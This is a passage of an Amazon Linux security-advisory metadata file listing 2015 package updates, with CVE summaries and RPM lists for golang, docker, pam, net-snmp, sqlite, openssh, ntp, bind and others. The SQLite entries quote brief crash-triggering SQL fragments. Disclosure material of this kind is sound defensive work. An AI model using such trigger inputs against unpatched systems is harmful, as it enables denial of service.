arch="i686"><filename>Packages/subversion-python26-1.8.13-7.52.amzn1.i686.rpm</filename></package><package name="subversion-libs" version="1.8.13" release="7.52.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-libs-1.8.13-7.52.amzn1.i686.rpm</filename></package><package name="subversion-python27" version="1.8.13" release="7.52.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python27-1.8.13-7.52.amzn1.i686.rpm</filename></package><package name="subversion-tools" version="1.8.13" release="7.52.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-tools-1.8.13-7.52.amzn1.i686.rpm</filename></package><package name="subversion-ruby" version="1.8.13" release="7.52.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-ruby-1.8.13-7.52.amzn1.i686.rpm</filename></package><package name="subversion-debuginfo" version="1.8.13" release="7.52.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-debuginfo-1.8.13-7.52.amzn1.i686.rpm</filename></package><package name="subversion-devel" version="1.8.13" release="7.52.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-devel-1.8.13-7.52.amzn1.i686.rpm</filename></package><package name="subversion-javahl" version="1.8.13" release="7.52.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-javahl-1.8.13-7.52.amzn1.i686.rpm</filename></package><package name="subversion" version="1.8.13" release="7.52.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-1.8.13-7.52.amzn1.i686.rpm</filename></package><package name="mod24_dav_svn" version="1.8.13" release="7.52.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_dav_svn-1.8.13-7.52.amzn1.i686.rpm</filename></package><package name="subversion-perl" version="1.8.13" release="7.52.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-perl-1.8.13-7.52.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-588</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-588: medium priority package update for golang docker</title><issued date="2015-08-24 22:29:00" /><updated date="2015-08-24 22:42:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-5741:
1250352:
CVE-2015-5739 CVE-2015-5740 CVE-2015-5741 golang: HTTP request smuggling in net/http library
CVE-2015-5740:
1250352:
CVE-2015-5739 CVE-2015-5740 CVE-2015-5741 golang: HTTP request smuggling in net/http library
CVE-2015-5739:
1250352:
CVE-2015-5739 CVE-2015-5740 CVE-2015-5741 golang: HTTP request smuggling in net/http library
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5739" title="" id="CVE-2015-5739" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5740" title="" id="CVE-2015-5740" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5741" title="" id="CVE-2015-5741" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-pkg-plan9-386" version="1.4.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-plan9-386-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package name="golang" version="1.4.2" release="3.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.4.2-3.16.amzn1.x86_64.rpm</filename></package><package name="golang-pkg-netbsd-arm" version="1.4.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-netbsd-arm-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package name="golang-pkg-windows-amd64" version="1.4.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-windows-amd64-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package name="golang-pkg-openbsd-386" version="1.4.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-openbsd-386-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package name="golang-pkg-freebsd-amd64" version="1.4.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-freebsd-amd64-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package name="golang-pkg-windows-386" version="1.4.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-windows-386-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package name="golang-pkg-openbsd-amd64" version="1.4.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-openbsd-amd64-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package name="golang-pkg-darwin-amd64" version="1.4.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-darwin-amd64-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package name="golang-pkg-bin-linux-amd64" version="1.4.2" release="3.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-pkg-bin-linux-amd64-1.4.2-3.16.amzn1.x86_64.rpm</filename></package><package name="golang-pkg-freebsd-386" version="1.4.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-freebsd-386-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package name="golang-pkg-linux-arm" version="1.4.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-linux-arm-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package name="golang-pkg-darwin-386" version="1.4.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-darwin-386-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package name="golang-pkg-netbsd-386" version="1.4.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-netbsd-386-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package name="golang-pkg-linux-386" version="1.4.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-linux-386-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.4.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package name="golang-pkg-netbsd-amd64" version="1.4.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-netbsd-amd64-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package name="golang-pkg-linux-amd64" version="1.4.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-linux-amd64-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package name="golang-pkg-freebsd-arm" version="1.4.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-freebsd-arm-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package name="golang-pkg-plan9-amd64" version="1.4.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-plan9-amd64-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package name="golang-pkg-bin-linux-386" version="1.4.2" release="3.16.amzn1" epoch="0" arch="i686"><filename>Packages/golang-pkg-bin-linux-386-1.4.2-3.16.amzn1.i686.rpm</filename></package><package name="golang" version="1.4.2" release="3.16.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.4.2-3.16.amzn1.i686.rpm</filename></package><package name="docker" version="1.6.2" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-1.6.2-1.3.amzn1.x86_64.rpm</filename></package><package name="docker-devel" version="1.6.2" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-devel-1.6.2-1.3.amzn1.x86_64.rpm</filename></package><package name="docker-pkg-devel" version="1.6.2" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-pkg-devel-1.6.2-1.3.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-589</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-589: medium priority package update for pam</title><issued date="2015-09-02 12:00:00" /><updated date="2015-09-02 12:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3238:
It was discovered that the _unix_run_helper_binary() function of PAM's unix_pam module could write to a blocking pipe, possibly causing the function to become unresponsive. An attacker able to supply large passwords to the unix_pam module could use this flaw to enumerate valid user accounts, or cause a denial of service on the system.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3238" title="" id="CVE-2015-3238" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1640.html" title="" id="RHSA-2015:1640" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="pam-devel" version="1.1.8" release="12.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam-devel-1.1.8-12.32.amzn1.x86_64.rpm</filename></package><package name="pam" version="1.1.8" release="12.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam-1.1.8-12.32.amzn1.x86_64.rpm</filename></package><package name="pam-debuginfo" version="1.1.8" release="12.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam-debuginfo-1.1.8-12.32.amzn1.x86_64.rpm</filename></package><package name="pam-devel" version="1.1.8" release="12.32.amzn1" epoch="0" arch="i686"><filename>Packages/pam-devel-1.1.8-12.32.amzn1.i686.rpm</filename></package><package name="pam" version="1.1.8" release="12.32.amzn1" epoch="0" arch="i686"><filename>Packages/pam-1.1.8-12.32.amzn1.i686.rpm</filename></package><package name="pam-debuginfo" version="1.1.8" release="12.32.amzn1" epoch="0" arch="i686"><filename>Packages/pam-debuginfo-1.1.8-12.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-590</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-590: medium priority package update for net-snmp</title><issued date="2015-09-02 12:00:00" /><updated date="2015-09-02 12:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-5621:
It was discovered that the snmp_pdu_parse() function could leave incompletely parsed varBind variables in the list of variables. A remote, unauthenticated attacker could use this flaw to crash snmpd or, potentially, execute arbitrary code on the system with the privileges of the user running snmpd.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5621" title="" id="CVE-2015-5621" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1636.html" title="" id="RHSA-2015:1636" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="net-snmp-libs" version="5.5" release="54.1.20.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-libs-5.5-54.1.20.amzn1.x86_64.rpm</filename></package><package name="net-snmp" version="5.5" release="54.1.20.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-5.5-54.1.20.amzn1.x86_64.rpm</filename></package><package name="net-snmp-python" version="5.5" release="54.1.20.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-python-5.5-54.1.20.amzn1.x86_64.rpm</filename></package><package name="net-snmp-debuginfo" version="5.5" release="54.1.20.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-debuginfo-5.5-54.1.20.amzn1.x86_64.rpm</filename></package><package name="net-snmp-perl" version="5.5" release="54.1.20.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-perl-5.5-54.1.20.amzn1.x86_64.rpm</filename></package><package name="net-snmp-utils" version="5.5" release="54.1.20.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-utils-5.5-54.1.20.amzn1.x86_64.rpm</filename></package><package name="net-snmp-devel" version="5.5" release="54.1.20.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-devel-5.5-54.1.20.amzn1.x86_64.rpm</filename></package><package name="net-snmp-devel" version="5.5" release="54.1.20.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-devel-5.5-54.1.20.amzn1.i686.rpm</filename></package><package name="net-snmp-libs" version="5.5" release="54.1.20.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-libs-5.5-54.1.20.amzn1.i686.rpm</filename></package><package name="net-snmp-utils" version="5.5" release="54.1.20.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-utils-5.5-54.1.20.amzn1.i686.rpm</filename></package><package name="net-snmp-python" version="5.5" release="54.1.20.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-python-5.5-54.1.20.amzn1.i686.rpm</filename></package><package name="net-snmp-debuginfo" version="5.5" release="54.1.20.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-debuginfo-5.5-54.1.20.amzn1.i686.rpm</filename></package><package name="net-snmp" version="5.5" release="54.1.20.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-5.5-54.1.20.amzn1.i686.rpm</filename></package><package name="net-snmp-perl" version="5.5" release="54.1.20.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-perl-5.5-54.1.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-591</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-591: medium priority package update for sqlite</title><issued date="2015-09-02 12:00:00" /><updated date="2015-09-02 12:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3416:
The sqlite3VXPrintf function in printf.c in SQLite before 3.8.9 does not properly handle precision and width values during floating-point conversions, which allows context-dependent attackers to cause a denial of service (integer overflow and stack-based buffer overflow) or possibly have unspecified other impact via large integers in a crafted printf function call in a SELECT statement.
It was found that SQLite's sqlite3VXPrintf() function did not properly handle precision and width values during floating-point conversions. A local attacker could submit a specially crafted SELECT statement that would crash the SQLite process, or have other unspecified impacts.
1212357:
CVE-2015-3416 sqlite: stack buffer overflow in src/printf.c
CVE-2015-3415:
The sqlite3VdbeExec function in vdbe.c in SQLite before 3.8.9 does not properly implement comparison operators, which allows context-dependent attackers to cause a denial of service (invalid free operation) or possibly have unspecified other impact via a crafted CHECK clause, as demonstrated by CHECK(0&O;&gt;O) in a CREATE TABLE statement.
It was found that SQLite's sqlite3VdbeExec() function did not properly implement comparison operators. A local attacker could submit a specially crafted CHECK statement that would crash the SQLite process, or have other unspecified impacts.
1212356:
CVE-2015-3415 sqlite: invalid free() in src/vdbe.c
CVE-2015-3414:
SQLite before 3.8.9 does not properly implement the dequoting of collation-sequence names, which allows context-dependent attackers to cause a denial of service (uninitialized memory access and application crash) or possibly have unspecified other impact via a crafted COLLATE clause, as demonstrated by COLLATE"""""""" at the end of a SELECT statement.
A flaw was found in the way SQLite handled dequoting of collation-sequence names. A local attacker could submit a specially crafted COLLATE statement that would crash the SQLite process, or have other unspecified impacts.
1212353:
CVE-2015-3414 sqlite: use of uninitialized memory when parsing collation sequences in src/where.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3414" title="" id="CVE-2015-3414" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3415" title="" id="CVE-2015-3415" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3416" title="" id="CVE-2015-3416" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="sqlite-doc" version="3.7.17" release="6.13.amzn1" epoch="0" arch="noarch"><filename>Packages/sqlite-doc-3.7.17-6.13.amzn1.noarch.rpm</filename></package><package name="sqlite" version="3.7.17" release="6.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sqlite-3.7.17-6.13.amzn1.x86_64.rpm</filename></package><package name="sqlite-devel" version="3.7.17" release="6.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sqlite-devel-3.7.17-6.13.amzn1.x86_64.rpm</filename></package><package name="lemon" version="3.7.17" release="6.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/lemon-3.7.17-6.13.amzn1.x86_64.rpm</filename></package><package name="sqlite-tcl" version="3.7.17" release="6.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sqlite-tcl-3.7.17-6.13.amzn1.x86_64.rpm</filename></package><package name="sqlite-debuginfo" version="3.7.17" release="6.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sqlite-debuginfo-3.7.17-6.13.amzn1.x86_64.rpm</filename></package><package name="sqlite-tcl" version="3.7.17" release="6.13.amzn1" epoch="0" arch="i686"><filename>Packages/sqlite-tcl-3.7.17-6.13.amzn1.i686.rpm</filename></package><package name="sqlite" version="3.7.17" release="6.13.amzn1" epoch="0" arch="i686"><filename>Packages/sqlite-3.7.17-6.13.amzn1.i686.rpm</filename></package><package name="sqlite-devel" version="3.7.17" release="6.13.amzn1" epoch="0" arch="i686"><filename>Packages/sqlite-devel-3.7.17-6.13.amzn1.i686.rpm</filename></package><package name="lemon" version="3.7.17" release="6.13.amzn1" epoch="0" arch="i686"><filename>Packages/lemon-3.7.17-6.13.amzn1.i686.rpm</filename></package><package name="sqlite-debuginfo" version="3.7.17" release="6.13.amzn1" epoch="0" arch="i686"><filename>Packages/sqlite-debuginfo-3.7.17-6.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-592</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-592: medium priority package update for openssh</title><issued date="2015-09-02 12:00:00" /><updated date="2015-09-02 12:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-6564:
Use-after-free vulnerability in the mm_answer_pam_free_ctx function in monitor.c in sshd in OpenSSH before 7.0 on non-OpenBSD platforms might allow local users to gain privileges by leveraging control of the sshd uid to send an unexpectedly early MONITOR_REQ_PAM_FREE_CTX request.
1252852:
CVE-2015-6564 openssh: Use-after-free bug related to PAM support
CVE-2015-6563:
The monitor component in sshd in OpenSSH before 7.0 on non-OpenBSD platforms accepts extraneous username data in MONITOR_REQ_PAM_INIT_CTX requests, which allows local users to conduct impersonation attacks by leveraging any SSH login access in conjunction with control of the sshd uid to send a crafted MONITOR_REQ_PWNAM request, related to monitor.c and monitor_wrap.c.
1252844:
CVE-2015-6563 openssh: Privilege separation weakness related to PAM support
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6563" title="" id="CVE-2015-6563" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6564" title="" id="CVE-2015-6564" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="pam_ssh_agent_auth" version="0.9.3" release="5.8.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.9.3-5.8.45.amzn1.x86_64.rpm</filename></package><package name="openssh-keycat" version="6.2p2" release="8.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-keycat-6.2p2-8.45.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="6.2p2" release="8.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-6.2p2-8.45.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="6.2p2" release="8.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-6.2p2-8.45.amzn1.x86_64.rpm</filename></package><package name="openssh" version="6.2p2" release="8.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-6.2p2-8.45.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="6.2p2" release="8.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-6.2p2-8.45.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="6.2p2" release="8.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-6.2p2-8.45.amzn1.x86_64.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9.3" release="5.8.45.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.9.3-5.8.45.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="6.2p2" release="8.45.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-6.2p2-8.45.amzn1.i686.rpm</filename></package><package name="openssh-server" version="6.2p2" release="8.45.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-server-6.2p2-8.45.amzn1.i686.rpm</filename></package><package name="openssh-ldap" version="6.2p2" release="8.45.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-6.2p2-8.45.amzn1.i686.rpm</filename></package><package name="openssh" version="6.2p2" release="8.45.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-6.2p2-8.45.amzn1.i686.rpm</filename></package><package name="openssh-keycat" version="6.2p2" release="8.45.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-keycat-6.2p2-8.45.amzn1.i686.rpm</filename></package><package name="openssh-clients" version="6.2p2" release="8.45.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-6.2p2-8.45.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-593</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-593: low priority package update for ntp</title><issued date="2015-09-02 12:00:00" /><updated date="2016-02-09 13:30:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-7703:
1254547:
CVE-2015-7703 ntp: config command can be used to set the pidfile and drift file paths
CVE-2015-5219:
1255118:
CVE-2015-5219 ntp: infinite loop in sntp processing crafted packet
CVE-2015-5195:
1254544:
CVE-2015-5195 ntp: ntpd crash when processing config commands with statistics type
CVE-2015-5194:
1254542:
CVE-2015-5194 ntp: crash with crafted logconfig configuration command
CVE-2015-5146:
1238136:
CVE-2015-5146 ntp: ntpd control message crash on crafted NUL-byte in configuration directive (VU#668167)
CVE-2015-3405:
A flaw was found in the way the ntp-keygen utility generated MD5 symmetric keys on big-endian systems. An attacker could possibly use this flaw to guess generated MD5 keys, which could then be used to spoof an NTP client or server.
1210324:
CVE-2015-3405 ntp: ntp-keygen may generate non-random symmetric keys on big-endian systems
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3405" title="" id="CVE-2015-3405" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5146" title="" id="CVE-2015-5146" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5194" title="" id="CVE-2015-5194" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5195" title="" id="CVE-2015-5195" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5219" title="" id="CVE-2015-5219" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7703" title="" id="CVE-2015-7703" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ntp-doc" version="4.2.6p5" release="33.26.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-doc-4.2.6p5-33.26.amzn1.noarch.rpm</filename></package><package name="ntp" version="4.2.6p5" release="33.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-4.2.6p5-33.26.amzn1.x86_64.rpm</filename></package><package name="ntpdate" version="4.2.6p5" release="33.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntpdate-4.2.6p5-33.26.amzn1.x86_64.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="33.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-debuginfo-4.2.6p5-33.26.amzn1.x86_64.rpm</filename></package><package name="ntp-perl" version="4.2.6p5" release="33.26.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-perl-4.2.6p5-33.26.amzn1.noarch.rpm</filename></package><package name="ntpdate" version="4.2.6p5" release="33.26.amzn1" epoch="0" arch="i686"><filename>Packages/ntpdate-4.2.6p5-33.26.amzn1.i686.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="33.26.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-debuginfo-4.2.6p5-33.26.amzn1.i686.rpm</filename></package><package name="ntp" version="4.2.6p5" release="33.26.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-4.2.6p5-33.26.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-594</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-594: critical priority package update for bind</title><issued date="2015-09-02 12:00:00" /><updated date="2015-09-02 13:05:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-5722:
Embargoed
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5722" title="" id="CVE-2015-5722" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-sdb" version="9.8.2" release="0.30.rc1.39.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.30.rc1.39.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.30.rc1.39.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.30.rc1.39.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.30.rc1.39.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.30.rc1.39.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.30.rc1.39.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.30.rc1.39.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.30.rc1.39.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.30.rc1.39.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.30.rc1.39.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.30.rc1.39.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.30.rc1.39.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.30.rc1.39.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.30.rc1.39.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.30.rc1.39.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.30.rc1.39.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.30.rc1.39.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.30.rc1.39.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.30.rc1.39.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.30.rc1.39.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.30.rc1.39.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.30.rc1.39.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.30.rc1.39.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.30.rc1.39.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.30.rc1.39.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.30.rc1.39.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.30.rc1.39.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-595</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-595: important priority package update for jakarta-taglibs-standard</title><issued date="2015-09-22 10:00:00" /><updated date="2015-09-22 10:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0254:
It was found that the Java Standard Tag Library (JSTL) allowed the processing of untrusted XML documents to utilize external entity references, which could access resources on the host system and, potentially, allowing arbitrary code execution.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0254" title="" id="CVE-2015-0254" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1695.html" title="" id="RHSA-2015:1695" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="jakarta-taglibs-standard" version="1.1.1" release="11.7.9.amzn1" epoch="0" arch="noarch"><filename>Packages/jakarta-taglibs-standard-1.1.1-11.7.9.amzn1.noarch.rpm</filename></package><package name="jakarta-taglibs-standard-javadoc" version="1.1.1" release="11.7.9.amzn1" epoch="0" arch="noarch"><filename>Packages/jakarta-taglibs-standard-javadoc-1.1.1-11.7.9.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-596</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-596: medium priority package update for nss-softokn</title><issued date="2015-09-22 10:00:00" /><updated date="2015-09-22 10:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-2730:
A flaw was found in the way NSS verified certain ECDSA (Elliptic Curve Digital Signature Algorithm) signatures. Under certain conditions, an attacker could use this flaw to conduct signature forgery attacks.
